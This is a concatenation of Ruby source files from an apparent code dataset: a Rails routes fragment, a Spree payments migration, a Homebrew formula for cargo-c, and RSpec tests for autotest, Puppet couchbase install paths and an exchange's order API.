resources(:scheduled_tasks, concerns: active_scaffold) do
collection do
get :status
get :status_content
end
member do
get :log
put :run_now
end
end
get '/tasks_scheduler_daemon', to: 'tasks_scheduler_daemon#index', as: :tasks_scheduler_daemon
post '/tasks_scheduler_daemon/:tasks_scheduler_execute_action',
to: 'tasks_scheduler_daemon#execute', as: :execute_tasks_scheduler_daemon
get '/tasks_scheduler_daemon/status', to: 'tasks_scheduler_daemon#status',
as: :status_tasks_scheduler_daemon
get '/tasks_scheduler_daemon/download_log/:log_key', to: 'tasks_scheduler_daemon#download_log',
as: :download_log_tasks_scheduler_daemon
end
| 38.636364 | 97 | 0.684706 |
1886edf566fee8e1384f445c433e0a25757c515d | 248 | class AddInstallmentsFieldToSpreePayment < ActiveRecord::Migration
def change
add_column :spree_payments, :installments, :integer, default: 1
add_column :spree_payments, :interest, :decimal, precision: 10, scale: 4, default: 0.0
end
end | 41.333333 | 90 | 0.770161 |
21c3038458bb31a2fc9a2fa1ee962f4bd50853f3 | 1,155 | class CargoC < Formula
desc "Helper program to build and install c-like libraries"
homepage "https://github.com/lu-zero/cargo-c"
url "https://github.com/lu-zero/cargo-c/archive/v0.6.12.tar.gz"
sha256 "42f6c26039d24b0fa684c36417de6e43e7861e6acf3a3accf52de5548bf57ec3"
license "MIT"
bottle do
cellar :any
sha256 "af41919e5b362afb73c5cc3506ef08591cb1edd6a35832876d523208ddc9c51d" => :catalina
sha256 "6ee6f29f098bdf4baa7f168b8e599b28458bc0de7892770067d5c82e1bdfc84b" => :mojave
sha256 "efbca9b10f3978505b658bba9f23d2ce4f49479efa44d0e0fc3febf450e2987b" => :high_sierra
end
depends_on "rust" => :build
depends_on "libgit2"
depends_on "libssh2"
depends_on "[email protected]"
on_linux do
depends_on "pkg-config" => :build
end
def install
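    # Build against Homebrew's libgit2/libssh2 (found via pkg-config) instead of the crates' vendored copies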
ENV["LIBGIT2_SYS_USE_PKG_CONFIG"] = "1"
ENV["LIBSSH2_SYS_USE_PKG_CONFIG"] = "1"
system "cargo", "install", *std_cargo_args
end
test do
cargo_error = "could not find `Cargo.toml`"
assert_match cargo_error, shell_output("#{bin}/cargo-cinstall cinstall 2>&1", 1)
assert_match cargo_error, shell_output("#{bin}/cargo-cbuild cbuild 2>&1", 1)
end
end
| 31.216216 | 93 | 0.743723 |
ff25cd8ae89e1a5fa880b48655987db16ad913b7 | 2,116 | require 'spec_helper'
describe 'couchbase_server', :type => :class do
let :params do
{
:version => '5.0.0'
}
end
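  # Each context below checks the platform-specific package filename used by couchbase_server::install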
context 'on an ubuntu system' do
let :facts do
{
:os => {
:family => 'Debian',
:name => 'Ubuntu',
:release => {
:full => '16.04'
}
}
}
end
context 'couchbase_server::install' do
it 'contains a valid package name' do
is_expected.to contain_file('couchbase-server').with(
'path' => '/tmp/couchbase-server-enterprise_5.0.0-ubuntu16.04_amd64.deb'
)
end
end
end
context 'on a debian system' do
let :facts do
{
:os => {
:family => 'Debian',
:name => 'Debian',
:release => {
:full => '7'
}
}
}
end
context 'couchbase_server::install' do
it 'contains a valid package name' do
is_expected.to contain_file('couchbase-server').with(
'path' => '/tmp/couchbase-server-enterprise_5.0.0-debian7_amd64.deb'
)
end
end
end
context 'on a centos system' do
let :facts do
{
:os => {
:family => 'RedHat',
:name => 'CentOS',
:release => {
:full => '7'
}
}
}
end
context 'couchbase_server::install' do
it 'contains a valid package name' do
is_expected.to contain_file('couchbase-server').with(
'path' => '/tmp/couchbase-server-enterprise-5.0.0-centos7.x86_64.rpm'
)
end
end
end
context 'on an opensuse system' do
let :facts do
{
:os => {
:family => 'RedHat',
:name => 'SuSE',
:release => {
:full => '12'
}
}
}
end
context 'couchbase_server::install' do
it 'contains a valid package name' do
is_expected.to contain_file('couchbase-server').with(
'path' => '/tmp/couchbase-server-enterprise-5.0.0-suse12.x86_64.rpm'
)
end
end
end
end
# vi: ts=2 et:
| 21.16 | 82 | 0.495747 |
bf92e13394211f1dd69433adbc78d24e0757e203 | 1,098 | require "spec_helper"
require "autotest/rails_rspec2"
describe Autotest::RailsRspec2 do
let(:rails_rspec2_autotest) { Autotest::RailsRspec2.new }
describe 'exceptions' do
let(:exceptions_regexp) { rails_rspec2_autotest.exceptions }
it "should match './log/test.log'" do
exceptions_regexp.should match('./log/test.log')
end
it "should match 'log/test.log'" do
exceptions_regexp.should match('log/test.log')
end
it "should not match './spec/models/user_spec.rb'" do
exceptions_regexp.should_not match('./spec/models/user_spec.rb')
end
it "should not match 'spec/models/user_spec.rb'" do
exceptions_regexp.should_not match('spec/models/user_spec.rb')
end
end
describe 'mappings' do
before do
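      # Seed Autotest's list of known files so the support-file mapping can resolve to the model spec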
rails_rspec2_autotest.find_order = %w(
spec/models/user_spec.rb
spec/support/blueprints.rb
)
end
it 'runs model specs when support files change' do
rails_rspec2_autotest.test_files_for('spec/support/blueprints.rb').should(
include('spec/models/user_spec.rb'))
end
end
end
| 26.142857 | 80 | 0.693989 |
7acd4e1c8b1c8d07cf345fcabaf3cc04b7743e8f | 10,334 | # encoding: UTF-8
# frozen_string_literal: true
describe APIv2::Orders, type: :request do
let(:member) { create(:member, :level_3) }
let(:level_0_member) { create(:member, :level_0) }
let(:token) { jwt_for(member) }
let(:level_0_member_token) { jwt_for(level_0_member) }
describe 'GET /api/v2/orders' do
before do
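      # Two active orders plus one cancelled and one done, to exercise the default and state filters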
create(:order_bid, market_id: 'btcusd', price: '11'.to_d, volume: '123.123456789', member: member)
create(:order_bid, market_id: 'btcusd', price: '12'.to_d, volume: '123.123456789', member: member, state: Order::CANCEL)
create(:order_ask, market_id: 'btcusd', price: '13'.to_d, volume: '123.123456789', member: member)
create(:order_ask, market_id: 'btcusd', price: '14'.to_d, volume: '123.123456789', member: member, state: Order::DONE)
end
it 'should require authentication' do
get '/api/v2/orders', market: 'btcusd'
expect(response.code).to eq '401'
end
it 'should validate market param' do
api_get '/api/v2/orders', params: { market: 'usdusd' }, token: token
expect(response).to have_http_status 422
expect(JSON.parse(response.body)).to eq ({ 'error' => { 'code' => 1001, 'message' => 'market does not have a valid value' } })
end
it 'should validate state param' do
api_get '/api/v2/orders', params: { market: 'btcusd', state: 'test' }, token: token
expect(response.code).to eq '422'
expect(JSON.parse(response.body)).to eq ({ 'error' => { 'code' => 1001, 'message' => 'state does not have a valid value' } })
end
it 'should return active orders by default' do
api_get '/api/v2/orders', params: { market: 'btcusd' }, token: token
expect(response).to be_success
expect(JSON.parse(response.body).size).to eq 2
end
it 'should return complete orders' do
api_get '/api/v2/orders', params: { market: 'btcusd', state: Order::DONE }, token: token
expect(response).to be_success
expect(JSON.parse(response.body).first['state']).to eq Order::DONE
end
it 'should return paginated orders' do
api_get '/api/v2/orders', params: { market: 'btcusd', limit: 1, page: 1 }, token: token
expect(response).to be_success
expect(JSON.parse(response.body).first['price']).to eq '11.0'
api_get '/api/v2/orders', params: { market: 'btcusd', limit: 1, page: 2 }, token: token
expect(response).to be_success
expect(JSON.parse(response.body).first['price']).to eq '13.0'
end
it 'should sort orders' do
api_get '/api/v2/orders', params: { market: 'btcusd', order_by: 'asc' }, token: token
expect(response).to be_success
orders = JSON.parse(response.body)
expect(orders[0]['id']).to be < orders[1]['id']
api_get '/api/v2/orders', params: { market: 'btcusd', order_by: 'desc' }, token: token
expect(response).to be_success
orders = JSON.parse(response.body)
expect(orders[0]['id']).to be > orders[1]['id']
end
it 'denies access to unverified member' do
api_get '/api/v2/orders', token: level_0_member_token
expect(response.code).to eq '401'
expect(JSON.parse(response.body)['error']).to eq( {'code' => 2000, 'message' => 'Please, pass the corresponding verification steps to enable trading.'} )
end
end
describe 'GET /api/v2/order' do
let(:order) { create(:order_bid, market_id: 'btcusd', price: '12.326'.to_d, volume: '3.14', origin_volume: '12.13', member: member, trades_count: 1) }
let!(:trade) { create(:trade, bid: order) }
it 'should get specified order' do
api_get '/api/v2/order', params: { id: order.id }, token: token
expect(response).to be_success
result = JSON.parse(response.body)
expect(result['id']).to eq order.id
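      # executed volume = origin_volume (12.13) - remaining volume (3.14)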
expect(result['executed_volume']).to eq '8.99'
end
it 'should include related trades' do
api_get '/api/v2/order', params: { id: order.id }, token: token
result = JSON.parse(response.body)
expect(result['trades_count']).to eq 1
expect(result['trades'].size).to eq 1
expect(result['trades'].first['id']).to eq trade.id
expect(result['trades'].first['side']).to eq 'buy'
end
it 'should get 404 error when order doesn\'t exist' do
api_get '/api/v2/order', params: { id: 99_999 }, token: token
expect(response.code).to eq '404'
end
end
describe 'POST /api/v2/orders/multi' do
before do
member.get_account(:btc).update_attributes(balance: 100)
member.get_account(:usd).update_attributes(balance: 100_000)
end
it 'should create a sell order and a buy order' do
params = {
market: 'btcusd',
orders: [
{ side: 'sell', volume: '12.13', price: '2014' },
{ side: 'buy', volume: '17.31', price: '2005' }
]
}
expect do
api_post '/api/v2/orders/multi', token: token, params: params
expect(response).to be_success
result = JSON.parse(response.body)
expect(result.size).to eq 2
expect(result.first['side']).to eq 'sell'
expect(result.first['volume']).to eq '12.13'
expect(result.last['side']).to eq 'buy'
expect(result.last['volume']).to eq '17.31'
end.to change(Order, :count).by(2)
end
it 'should create nothing on error' do
params = {
market: 'btcusd',
orders: [
{ side: 'sell', volume: '12.13', price: '2014' },
{ side: 'buy', volume: '17.31', price: 'test' } # <- invalid price
]
}
# expect {
# AMQPQueue.expects(:enqueue).times(0)
# signed_post '/api/v2/orders/multi', token: token, params: params
# expect(response.code).to eq '422'
# expect(response.body).to eq ({'error':{'code':2002,'message':'Failed to create order. Reason\: Validation failed\: Price must be greater than 0'}})
# }.not_to change(Order, :count)
end
end
describe 'POST /api/v2/orders' do
it 'should create a sell order' do
member.get_account(:btc).update_attributes(balance: 100)
expect do
api_post '/api/v2/orders', token: token, params: { market: 'btcusd', side: 'sell', volume: '12.13', price: '2014' }
expect(response).to be_success
expect(JSON.parse(response.body)['id']).to eq OrderAsk.last.id
end.to change(OrderAsk, :count).by(1)
end
it 'should create a buy order' do
member.get_account(:usd).update_attributes(balance: 100_000)
expect do
api_post '/api/v2/orders', token: token, params: { market: 'btcusd', side: 'buy', volume: '12.13', price: '2014' }
expect(response).to be_success
expect(JSON.parse(response.body)['id']).to eq OrderBid.last.id
end.to change(OrderBid, :count).by(1)
end
it 'should return cannot lock funds error' do
old_count = OrderAsk.count
api_post '/api/v2/orders', token: token, params: { market: 'btcusd', side: 'sell', volume: '12.13', price: '2014' }
expect(response.code).to eq '422'
expect(response.body).to eq '{"error":{"code":2005,"message":"Not enough funds to create order."}}'
expect(OrderAsk.count).to eq old_count
end
    it 'should reject a non-numeric volume parameter' do
api_post '/api/v2/orders', token: token, params: { market: 'btcusd', side: 'sell', volume: 'test', price: '2014' }
expect(response.code).to eq '422'
expect(response.body).to eq '{"error":{"code":1001,"message":"volume is invalid"}}'
end
    it 'should reject a non-numeric price parameter' do
api_post '/api/v2/orders', token: token, params: { market: 'btcusd', side: 'sell', volume: '12.13', price: 'test' }
expect(response.code).to eq '422'
expect(response.body).to eq '{"error":{"code":1001,"message":"price is invalid"}}'
end
end
describe 'POST /api/v2/order/delete' do
let!(:order) { create(:order_bid, market_id: 'btcusd', price: '12.326'.to_d, volume: '3.14', origin_volume: '12.13', locked: '20.1082', origin_locked: '38.0882', member: member) }
    context 'successful' do
before do
member.get_account(:usd).update_attributes(locked: order.price * order.volume)
end
it 'should cancel specified order' do
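        # Cancellation is delegated to the matching engine via AMQP, so no Order row is removed here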
AMQPQueue.expects(:enqueue).with(:matching, action: 'cancel', order: order.to_matching_attributes)
expect do
api_post '/api/v2/order/delete', params: { id: order.id }, token: token
expect(response).to be_success
expect(JSON.parse(response.body)['id']).to eq order.id
end.not_to change(Order, :count)
end
end
context 'failed' do
it 'should return order not found error' do
api_post '/api/v2/order/delete', params: { id: '0' }, token: token
expect(response.code).to eq '422'
expect(JSON.parse(response.body)['error']['code']).to eq 2003
end
end
end
describe 'POST /api/v2/orders/clear' do
before do
create(:order_ask, market_id: 'btcusd', price: '12.326', volume: '3.14', origin_volume: '12.13', member: member)
create(:order_bid, market_id: 'btcusd', price: '12.326', volume: '3.14', origin_volume: '12.13', member: member)
member.get_account(:btc).update_attributes(locked: '5')
member.get_account(:usd).update_attributes(locked: '50')
end
it 'should cancel all my orders' do
member.orders.each do |o|
AMQPQueue.expects(:enqueue).with(:matching, action: 'cancel', order: o.to_matching_attributes)
end
expect do
api_post '/api/v2/orders/clear', token: token
expect(response).to be_success
result = JSON.parse(response.body)
expect(result.size).to eq 2
end.not_to change(Order, :count)
end
it 'should cancel all my asks' do
member.orders.where(type: 'OrderAsk').each do |o|
AMQPQueue.expects(:enqueue).with(:matching, action: 'cancel', order: o.to_matching_attributes)
end
expect do
api_post '/api/v2/orders/clear', token: token, params: { side: 'sell' }
expect(response).to be_success
result = JSON.parse(response.body)
expect(result.size).to eq 1
expect(result.first['id']).to eq member.orders.where(type: 'OrderAsk').first.id
end.not_to change(Order, :count)
end
end
end
| 39.143939 | 183 | 0.628314 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.